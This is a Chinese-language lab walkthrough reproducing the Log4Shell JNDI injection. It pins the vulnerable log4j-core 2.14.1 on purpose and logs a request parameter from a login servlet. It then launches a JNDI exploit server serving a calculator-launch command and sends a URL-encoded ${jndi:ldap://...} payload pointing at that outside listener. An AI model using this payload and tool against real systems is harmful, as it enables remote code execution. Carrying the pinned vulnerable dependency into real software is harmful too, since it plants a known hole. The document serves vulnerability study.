log4j
在项目中使用log4j
在pom.xml 中导入
<dependencies>
    <!-- log4j-core 2.14.1 is the release this walkthrough targets on purpose: the JNDI
         lookup injected through the logged request parameter below relies on it being
         unpatched. Outside this lab, declare a patched log4j-core release instead. -->
    <dependency>
        <groupId>org.apache.logging.log4j</groupId>
        <artifactId>log4j-core</artifactId>
        <version>2.14.1</version>
    </dependency>
</dependencies>

使用log4j
| package org.example.log4jweb;
import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger;
import javax.servlet.ServletException; import javax.servlet.annotation.WebServlet; import javax.servlet.http.HttpServlet; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import java.io.IOException;
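@WebServlet(name = "LoginServlet", value = "/login")
public class LoginServlet extends HttpServlet {

    /** One logger per class; the container keeps a single instance of this servlet anyway. */
    private static final Logger LOGGER = LogManager.getLogger();

    /**
     * Handles {@code GET /login}: validates the {@code name} and {@code password} query
     * parameters, records the login attempt and echoes the supplied name back to the caller.
     *
     * <p>{@code name} is request input and is passed straight to the logger. With the
     * {@code log4j-core 2.14.1} dependency declared in this project's pom.xml, the walkthrough
     * below shows that a {@code ${jndi:...}} value in this parameter is resolved when the log
     * line is written, so the {@code LOGGER.info} call is the injection point of the lab. On a
     * real deployment the fix is a patched log4j-core release, independently of the hygiene
     * changes made here (no credential in the log, no request input echoed as HTML).
     *
     * @param req  the incoming request; {@code name} and {@code password} are read from its
     *             query string
     * @param resp the response; receives 400 with a short message when either parameter is
     *             missing, otherwise 200 with the echoed name
     * @throws ServletException never thrown here; declared by the overridden method
     * @throws IOException if the response writer cannot be obtained or written
     */
    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp)
            throws ServletException, IOException {
        String name = req.getParameter("name");
        String password = req.getParameter("password");

        if (isMissing(name) || isMissing(password)) {
            resp.setStatus(HttpServletResponse.SC_BAD_REQUEST);
            resp.setContentType("text/plain;charset=UTF-8");
            resp.getWriter().write("name or password is empty");
            return;
        }

        // Only the user name is logged. The original recorded the password too, which writes a
        // credential into the log files in clear text; log lines must not contain secrets
        // regardless of which logging library is in use.
        LOGGER.info("name:{}", name);

        // Same parameterised-message mechanism as the log call. Per the walkthrough, the lookup
        // expands in the log output, not in this echoed string, which only fills the {} slot.
        String result = LOGGER.getMessageFactory().newMessage("name:{}", name).getFormattedMessage();

        // Served as text/plain rather than text/html: the echoed value is request input, and
        // writing it unescaped into an HTML body would make this endpoint a reflected-XSS sink
        // on top of the logging issue.
        resp.setStatus(HttpServletResponse.SC_OK);
        resp.setContentType("text/plain;charset=UTF-8");
        resp.getWriter().write(result);
    }

    /**
     * Returns {@code true} when {@code value} is {@code null} or empty — the same check the
     * original applied inline to both parameters.
     */
    private static boolean isMissing(String value) {
        return value == null || value.isEmpty();
    }
}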
创建一个javaee 进行测试
作为测试,将会输出输入的name和password

虽然没有在前端解析,但是后端日志中已经成功解析

这个地方其实已经说明了参数是可控的
然后就可以使用jndi 进行复现了
首先运行jndi 工具
# Lab-only helper: starts the listener that the request below points the vulnerable
# application at (-A is the listener address, -C the command it serves back). From the
# defender's side the observable event is the outbound connection from the application
# server to this address on the LDAP port in the request URL: egress filtering on the
# server blocks it, and connection logs reveal it.
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open -a Calculator" -A "198.19.249.35"
然后发送请求
| http://localhost:8080/Log4jWeb_war/login?name=%24%7Bjndi%3Aldap%3A%2F%2F198.19.249.35%3A1389%2Fki0ww0%7D&password=456